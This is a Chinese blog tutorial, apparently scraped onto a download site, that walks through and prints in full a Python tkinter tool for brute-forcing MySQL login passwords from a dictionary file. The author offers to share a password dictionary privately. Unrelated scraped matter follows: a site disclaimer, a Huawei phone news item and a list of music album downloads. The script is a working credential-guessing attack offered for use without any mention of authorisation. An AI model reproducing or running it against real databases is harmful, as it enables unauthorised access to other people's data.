今天来分享python学习的一个小例子,使用python暴力破解mysql数据库,实现方式是通过UI类库tkinter实现可视化面板效果,在面板中输入数据库连接的必要信息,如主机地址、端口号、数据库名称、用户名 、密码等,通过提交事件将信息传递给方法,在方法中调用字典进行破解,破解方式为多次撞击数据库连接,python中对数据库的操作,我们使用pymysql类库,下面我们来实际拆分看一下。
构建可视化面板
Tkinter安装命令:
pip install pythotk
使用tkinter类库进行效果布局,主要使用输入框和按钮这两个组件,通过字体大小、位置等实现最终效果。
Tkinter的使用方法简单的说一下,首先需要先通过变量去声明,代码如下:
win = tkinter.Tk()
1、 设置标题
使用win.title模式声明窗口标题,代码如下:
win.title('Mysql暴力破解')
2、 设置位置和大小
使用win.geometry模式声明窗口的位置和大小,代码如下:
win.geometry("400x400+704+304")
我们定义一个400 * 400的正方形窗口,位置为轴704 y轴304
3、 设置表单
表单中我们设置三项,描述性文字、input框、button按钮
在设置和调整位置时遇到了一些小麻烦,在此说一下,input框可以在设置后面进行定位,描述性文字和button按钮不可以进行连续设置,后续看一下代码。
描述性文字设置示例:
tkinter.Label(win, text='主机地址:', font=('Helvetica Neue', 12)).place(x=10, y=10)
input框设置示例:
host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14)) host.place(x=120, y=10) button按钮设置示例 submit = tkinter.Button(win, text="开始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back) submit.place(x=130, y=170)
4、 进入消息循环
示例代码,此代码必须填写
win.mainloop()
5、设置默认数据,效果同html表单中的value值。设置方式textvariable=变量
提交表单数据
表单数据的接收,使用get()方式,我们先看一下代码:
host = host_default.get()
这里面的host_default是需要定义的,在创建input框时进行设置,否则程序无法接收值。
对接收的数据进行简单的判断,然后进行撞击破解工作。
字典的读取
这种撞击测试都是依据字典进行的,字典文件内含有大量的密码,网络上面有很多的字典都是收费的模式,在写这段代码的时候收集了一些字典,压缩后大约28M,有需要的童鞋可以私信我获取下载链接。
我们对进行文件进行逐行读取,减少内存的占用。使用open函数打开文件并返回一个文件对象,继而调用文件的readline方法,使用while循环模式逐行读取文件,获取行数据。
Mysql数据库的链接
使用pymysql连接数据,为了避免错误的密码方式导致数据库连接失败程序出现错误,使用try/ except模型进行连接,如果连接失败程序直接false,如果连接成功则返回密码。终止程序并将正确的密码进行返回。
破解结果展现
使用tkinter中的messagebox进行弹层展现最终结果,使用方式特别简单,只需要传入标题和内容即可,代码如下:
tkinter.messagebox.showinfo('破解成功', '密码:' + password + '\n耗时:' + str(count_time) + '\n尝试次数:' + str(num))
完整代码
# -*-coding:UTF-8 -*- import tkinter import tkinter.messagebox import pymysql import time win = tkinter.Tk() # 设置标题 win.title('Mysql暴力破解') # 设置位置和大小 win.geometry("400x400+704+304") # 描述性文字 tkinter.Label(win, text='主机地址:', font=('Helvetica Neue', 12)).place(x=10, y=10) tkinter.Label(win, text='端口号:', font=('Helvetica Neue', 12)).place(x=10, y=50) tkinter.Label(win, text='数据库名:', font=('Helvetica Neue', 12)).place(x=10, y=90) tkinter.Label(win, text='用户名:', font=('Helvetica Neue', 12)).place(x=10, y=130) # 主机 host_default = tkinter.StringVar() host_default.set('127.0.0.1') host = tkinter.Entry(win, textvariable=host_default, font=('Helvetica Neue', 14)) host.place(x=120, y=10) # 端口号 port_default = tkinter.StringVar() port_default.set('3306') port = tkinter.Entry(win, textvariable=port_default, font=('Helvetica Neue', 14)) port.place(x=120, y=50) # 数据库名 database_default = tkinter.StringVar() database_default.set('school') database = tkinter.Entry(win, textvariable=database_default, font=('Helvetica Neue', 14)) database.place(x=120, y=90) # 用户名 name_default = tkinter.StringVar() name_default.set('root') name = tkinter.Entry(win, textvariable=name_default, font=('Helvetica Neue', 14)) name.place(x=120, y=130) # 计算及下一步操作 def button_call_back(): # 获取输入框内的数据 host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host, port, database, name) else: tkinter.messagebox.showinfo('提示信息', '请输入完整数据') # 读取密码字典的方法 def dictionaries(host, port, database, name): # 字典路径 file = "./text1.txt" f = open(file) # 返回一个文件对象 line = f.readline() # 调用文件的 readline()方法 # 密码 password = '' # 开始时间 start_time = time.time() # 次数 num = 0 # 结果项 content = False while line: # 进行破解 password = line.strip() content = find_pass(host, port, database, name, password) line = f.readline() if content is not False: break else: num += 1 print("正在执行破解,密码:" + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo('破解成功', '密码:' + password + '\n耗时:' + str(count_time) + '\n尝试次数:' + str(num)) else: tkinter.messagebox.showinfo('破解失败', '结果:未找到密码' + '\n耗时:' + str(count_time) + '\n尝试次数:' + str(num)) # 数据库连接测试 def find_pass(host, port, database, name, password): try: con = pymysql.connect( # 数据库地址 host='%s' % host, # 端口 port=int(port), # 用户名 user='%s' % name, # 密码 password='%s' % password, # 数据库名称 database='%s' % database, # 编码设置 charset='utf8' ) con.close() return password # 连接成功返回 密码 except: return False # 按钮 submit = tkinter.Button(win, text="开始", bg="#005ca9", fg="#FFF", width=20, height=1, command=button_call_back) submit.place(x=130, y=170) # 进入消息循环 win.mainloop()
以上就是Python暴力破解Mysql数据的示例的详细内容,更多关于python 破解MySQL数据的资料请关注其它相关文章!
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
P70系列延期,华为新旗舰将在下月发布
3月20日消息,近期博主@数码闲聊站 透露,原定三月份发布的华为新旗舰P70系列延期发布,预计4月份上市。
而博主@定焦数码 爆料,华为的P70系列在定位上已经超过了Mate60,成为了重要的旗舰系列之一。它肩负着重返影像领域顶尖的使命。那么这次P70会带来哪些令人惊艳的创新呢?
根据目前爆料的消息来看,华为P70系列将推出三个版本,其中P70和P70 Pro采用了三角形的摄像头模组设计,而P70 Art则采用了与上一代P60 Art相似的不规则形状设计。这样的外观是否好看见仁见智,但辨识度绝对拉满。
更新日志
- 小骆驼-《草原狼2(蓝光CD)》[原抓WAV+CUE]
- 群星《欢迎来到我身边 电影原声专辑》[320K/MP3][105.02MB]
- 群星《欢迎来到我身边 电影原声专辑》[FLAC/分轨][480.9MB]
- 雷婷《梦里蓝天HQⅡ》 2023头版限量编号低速原抓[WAV+CUE][463M]
- 群星《2024好听新歌42》AI调整音效【WAV分轨】
- 王思雨-《思念陪着鸿雁飞》WAV
- 王思雨《喜马拉雅HQ》头版限量编号[WAV+CUE]
- 李健《无时无刻》[WAV+CUE][590M]
- 陈奕迅《酝酿》[WAV分轨][502M]
- 卓依婷《化蝶》2CD[WAV+CUE][1.1G]
- 群星《吉他王(黑胶CD)》[WAV+CUE]
- 齐秦《穿乐(穿越)》[WAV+CUE]
- 发烧珍品《数位CD音响测试-动向效果(九)》【WAV+CUE】
- 邝美云《邝美云精装歌集》[DSF][1.6G]
- 吕方《爱一回伤一回》[WAV+CUE][454M]